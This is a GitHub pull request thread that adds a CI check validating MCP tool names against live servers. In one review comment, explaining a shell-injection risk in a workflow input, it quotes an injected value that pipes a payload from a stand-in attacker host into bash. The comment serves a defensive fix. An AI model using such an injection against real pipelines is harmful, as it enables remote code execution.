ci: add MCP tool name validation against live servers by jordigilh · Pull Request #95 · RHEcosystemAppEng/agentic-collections

jordigilh · 2026-05-08T17:28:33Z

Summary

Adds a CI check that starts each pack's MCP servers (from mcps.json) via podman and cross-references the allowed-tools declared in SKILL.md frontmatter against the actual tools exposed by the server
Catches tool name mismatches (e.g., pod_list vs pods_list) that pass all static linters but silently break skills at runtime
Uses a Kind cluster to provide a valid kubeconfig for MCP server startup

Motivation

While working on PRs #79 and #80, we discovered 6 tool name mismatches between our SKILL.md declarations and the actual MCP server tool registry. These went undetected by the existing skill-linter and compliance-check because they only validate static structure, not runtime tool availability.

SKILL.md declared	Actual MCP tool
`pod_list`	`pods_list`
`pod_logs`	`pods_log`
`get_metric_names`	(doesn't exist)
`get_metric_metadata`	(doesn't exist)
`get_series`	(doesn't exist)
`query`	`prometheus_query`

Components

scripts/validate-mcp-tools.sh — Starts container-based MCP servers via podman, sends JSON-RPC initialize + tools/list, and validates each skill's allowed-tools
.github/workflows/mcp-tool-validation.yml — GitHub Actions workflow using Kind cluster + podman, triggers on changes to mcps.json or SKILL.md files

Test plan

Tested locally against rh-developer pack — correctly detected 6 mismatches in incident-triage (pre-fix) and passed debug-scc/debug-rbac (post-fix)
Verify workflow runs successfully in CI with Kind cluster
Verify credential-gated MCP servers (github, lightspeed-mcp) are gracefully skipped

Made with Cursor

Adds a CI check that starts each pack's MCP servers (from mcps.json) and cross-references the `allowed-tools` declared in SKILL.md frontmatter against the actual tools exposed by the server. This catches tool name mismatches (e.g., pod_list vs pods_list) that would silently break skills at runtime but pass all static linters. Components: - scripts/validate-mcp-tools.sh: bash script that starts container- based MCP servers via podman, sends JSON-RPC initialize + tools/list, and validates each skill's allowed-tools against the response - .github/workflows/mcp-tool-validation.yml: GitHub Actions workflow using Kind cluster + podman, triggers on changes to mcps.json or SKILL.md files Co-authored-by: Cursor <cursoragent@cursor.com>

Replace bash script with a pure-Python implementation for cross-OS portability. Key improvements: - Response-based MCP communication via subprocess + select (no sleeps) - Explicit image pulling with error handling - JSON-RPC pagination support (follows nextCursor) - Levenshtein-based "did you mean?" suggestions for mismatched tools - Graceful handling of servers that exit immediately (missing creds) - File path and line number in error output - Logging of skipped non-container MCP servers Workflow hardening: - Pin all GitHub Actions to SHA - Add permissions: contents: read - Add concurrency group with cancel-in-progress - Add timeout-minutes: 10 - Explicit KUBECONFIG capture from Kind - Add workflow_dispatch pack input for manual runs - Inline pack detection (remove dependency on detect-changed-packs.sh) Co-authored-by: Cursor <cursoragent@cursor.com>

dmartinol · 2026-05-11T12:23:23Z

Hey @jordigilh thanks for your contribution to proactively catch these mismtaches!
To avoid risky changes, we decided to postpone commits that could affect the skill's execution post-Summit, hop e you can understand.

Apart from that, 2 comments on this awesome PR:
1- we should improve the suggestion mechanism to suggest matching names in case of missed toolset or wrong toolset or tool name. Maybe using semantic search with a small embedding model we can avoid coding complex match logic?
2- try to extend the check for non containerized commands (uvx, npm)

jordigilh · 2026-05-11T13:28:07Z

Thanks @dmartinol — totally understand the post-Summit freeze. No rush on merging this one.

On your two suggestions:

Semantic search for suggestions — interesting idea. The current Levenshtein approach catches simple typos (pod_list → pods_list) but misses semantic gaps like query → prometheus_query. An embedding model would handle that better. I'll explore lightweight options (e.g., a small sentence-transformer or even TF-IDF over tool names + descriptions) as a follow-up so we don't add heavy dependencies to CI.
Non-containerized commands (npx, uvx) — agreed, this would future-proof the check. Right now no skills declare allowed-tools referencing tools from npx-based servers, so there's zero false-positive risk from skipping them. But as more skills adopt allowed-tools, we'll want coverage. I'll look into adding Node.js to the CI environment and handling the different startup patterns.

Happy to iterate on both after Summit. Let me know if there's anything else you'd like adjusted in the meantime.

dmartinol · 2026-05-12T06:52:46Z

2. Non-containerized commands (npx, uvx) — agreed, this would future-proof the check. Right now no skills declare allowed-tools referencing tools from npx-based servers, so there's zero false-positive risk from skipping them. But as more skills adopt allowed-tools, we'll want coverage. I'll look into adding Node.js to the CI environment and handling the different startup patterns.

Thanks for being available to extend this solution! And yes, we'll also extend the coverage of allowed-tools fields early next week.

jordigilh · 2026-05-12T14:34:47Z

@dmartinol @r2dedios Thanks for the feedback on integrating this into the validate make target. Before pushing changes, I'd like to get your input on the approach since validate_mcp_tools.py has heavier prerequisites (podman + KUBECONFIG/Kind) than the existing validation steps.

Option A: Add it to make validate with graceful skip

The script would detect missing prerequisites (no podman, no KUBECONFIG) and exit 0 with a warning instead of failing. This keeps make validate and compliance-check.yml working as-is — the MCP step simply auto-skips when the infra isn't there. Locally, devs with podman get the full check; those without get a skip message.

Pro: Single make validate command always works everywhere
Con: Silent skipping can mask the fact that MCP validation didn't actually run

Option B: Standalone target + keep workflows separate

Add make validate-mcp-tools as its own target (supports PACK=rh-developer), but don't add it to make validate. The existing compliance-check.yml stays fast and lightweight (static checks only), while mcp-tool-validation.yml handles the runtime validation with its own podman/Kind setup and targeted triggers (mcps.json, SKILL.md changes).

Pro: Clean separation of static vs. runtime validation; no extra CI minutes on docs-only PRs
Con: make validate doesn't cover MCP tools — devs need to know to run make validate-mcp-tools separately

I'm leaning toward Option B since MCP validation is fundamentally a runtime check (starts containers, JSON-RPC handshake) while the other validate steps are static. But happy to go with either — what's your preference?

dmartinol · 2026-05-12T15:26:36Z

I'm leaning toward Option B since MCP validation is fundamentally a runtime check (starts containers, JSON-RPC handshake) while the other validate steps are static. But happy to go with either — what's your preference?

Hey @jordigilh, good catch!
Whatever the selected option (initially I opted for A, because I did not experience long waiting time during my tests, but B is fine as well), the important is to provide the developer with tools to identify the mismatches and to help him with the fix (e.g. extend the suggestion range).

BTW: other tools we should be considering are the CLI tools that are sometimes referred in the SKILL.md, like oc, but those are harder to be found with a python script.

- Add validate_mcp_tools.py to the main `validate` Makefile target - Add standalone `validate-mcp-tools` target with PACK= filter support - Add graceful prerequisite detection: script exits 0 with a SKIP message when podman or KUBECONFIG is unavailable, so `make validate` never breaks in environments without container tooling - Improve tool name suggestions with substring/prefix matching and component overlap scoring alongside the existing Levenshtein distance Co-authored-by: Cursor <cursoragent@cursor.com>

r2dedios · 2026-05-19T15:00:43Z

+          KUBECONFIG: ${{ env.KUBECONFIG }}
+        run: |
+          if [ "${{ github.event_name }}" = "workflow_dispatch" ] && [ -n "${{ inputs.pack }}" ]; then
+            python scripts/validate_mcp_tools.py "${{ inputs.pack }}"


Potential security injection risk. If someone introduces a bash command like foo"; curl evil.com/payload | bash; echo " it could create a huge mess. I propose using another EnvVar, so Github will use the value of ${{ inputs.pack }} always as Strings, and never a executable code.

env: PACK: ${{ inputs.pack }} run: python scripts/validate_mcp_tools.py "$PACK"

Good catch — fixed in 1167429.

All ${{ }} expressions in run: blocks are now routed through env: vars:

inputs.pack → INPUT_PACK

github.base_ref → BASE_REF

steps.detect.outputs.packs → CHANGED_PACKS

steps.detect.outputs.changed → PACKS_CHANGED

github.event_name → EVENT_NAME

Shell only ever sees quoted env var references, never raw template interpolation.

r2dedios · 2026-05-19T15:26:42Z

+          sudo apt-get update -qq
+          sudo apt-get install -y -qq podman
+
+      - name: Create Kind cluster


Why the Kind cluster creation at this point? Is it for generating a kubeconfig file for the MCP? If we only want to get the tools list, we can use an empty kubeconfig and query the MCP for the Tools list and we will not need to setup a Kind cluster everytime

Great observation — you're right, tools/list is purely metadata and doesn't require cluster connectivity. Fixed in 1167429.

Removed the Kind cluster entirely and replaced it with a minimal dummy kubeconfig that satisfies the MCP server's startup requirement. This saves ~2 minutes of CI time per run and removes the helm/kind-action dependency.

- Fix shell injection: route all ${{ }} expressions through env vars (inputs.pack, github.base_ref, steps.detect.outputs.packs) - Remove Kind cluster: tools/list doesn't need cluster connectivity, use a dummy kubeconfig instead (~2 min CI savings) - Remove unused `import re` and dead `TOOLS_LIST_MSG` constant - Add error handling for malformed mcps.json files Co-authored-by: Cursor <cursoragent@cursor.com>

- Fix race condition: replace time.sleep(0.5) with poll loop (10x100ms) for more reliable server startup detection - Document platform requirement (Linux/macOS) in script docstring - Document fetch-depth: 0 rationale in workflow comment - Simplify workflow dispatch logic with early-exit for unchanged PRs - Update Makefile messaging to clarify graceful skip behavior Co-authored-by: Cursor <cursoragent@cursor.com>

r2dedios

LGTM 🚀

jordigilh and others added 2 commits May 8, 2026 13:28

dmartinol reviewed May 12, 2026

View reviewed changes

Comment thread scripts/validate_mcp_tools.py

r2dedios requested changes May 19, 2026

View reviewed changes

jordigilh and others added 2 commits May 19, 2026 11:37

r2dedios approved these changes May 21, 2026

View reviewed changes

r2dedios merged commit fd3026e into RHEcosystemAppEng:main May 21, 2026
2 checks passed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ci: add MCP tool name validation against live servers#95

ci: add MCP tool name validation against live servers#95
r2dedios merged 5 commits into
RHEcosystemAppEng:mainfrom
jordigilh:feat/mcp-tool-validation-ci

jordigilh commented May 8, 2026

Uh oh!

dmartinol commented May 11, 2026

Uh oh!

jordigilh commented May 11, 2026

Uh oh!

dmartinol commented May 12, 2026

Uh oh!

Uh oh!

jordigilh commented May 12, 2026

Uh oh!

dmartinol commented May 12, 2026

Uh oh!

r2dedios May 19, 2026

Uh oh!

jordigilh May 19, 2026

Uh oh!

r2dedios May 19, 2026

Uh oh!

jordigilh May 19, 2026

Uh oh!

r2dedios left a comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants

Conversation

jordigilh commented May 8, 2026

Summary

Motivation

Components

Test plan

Uh oh!

dmartinol commented May 11, 2026

Uh oh!

jordigilh commented May 11, 2026

Uh oh!

dmartinol commented May 12, 2026

Uh oh!

Uh oh!

jordigilh commented May 12, 2026

Uh oh!

dmartinol commented May 12, 2026

Uh oh!

r2dedios May 19, 2026

Choose a reason for hiding this comment

Uh oh!

jordigilh May 19, 2026

Choose a reason for hiding this comment

Uh oh!

r2dedios May 19, 2026

Choose a reason for hiding this comment

Uh oh!

jordigilh May 19, 2026

Choose a reason for hiding this comment

Uh oh!

r2dedios left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants